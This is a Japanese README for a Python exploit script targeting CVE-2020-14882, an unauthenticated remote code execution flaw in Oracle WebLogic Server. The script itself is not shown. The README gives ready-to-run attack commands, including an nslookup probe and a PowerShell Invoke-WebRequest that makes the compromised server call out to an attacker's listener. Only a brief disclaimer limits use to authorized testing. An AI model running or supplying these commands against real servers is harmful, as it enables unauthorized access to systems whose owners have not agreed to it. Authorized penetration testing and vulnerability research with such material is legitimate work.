
このスクリプトにより、Oracle WebLogic Server上でのリモートコード実行(RCE)が可能になります。
このスクリプトは、認証されていないGETリクエストを使用して、Oracle WebLogic Serverでリモートコード実行(RCE)を可能にします。これは脆弱性CVE-2020-14882を悪用します。任意のコマンドを実行することで、攻撃者はサーバーへの不正アクセスを取得できます。
Python 3がインストールされていることを確認してください。このスクリプトを使用するには、以下の手順に従ってください:
ターミナルまたはコマンドプロンプトを開きます。
以下のコマンドを使用してスクリプトを実行します:
python3 exploit.py http(s)://target:7001 command
http(s)://target:7001 をOracle WebLogic ServerのターゲットURLに、command を実行したいコマンドに置き換えてください。
例1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
この例では、ターゲットサーバー上で nslookup your_Domain コマンドを実行します。
例2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
この例では、ターゲットサーバー上でPowerShellコマンド Invoke-WebRequest -Uri http://your_listener を実行します。
このスクリプトは、許可されたペネトレーションテストおよびセキュリティ研究目的のみでの使用を意図しています。 適切な同意なしにシステムを悪用するためにこのスクリプトを不正使用することは違法であり、法的結果を招く可能性があります。自己責任で使用してください。
このスクリプトには以下の依存関係が必要です:
requestsurllib3スクリプトを実行する前に、これらの依存関係がインストールされていることを確認してください。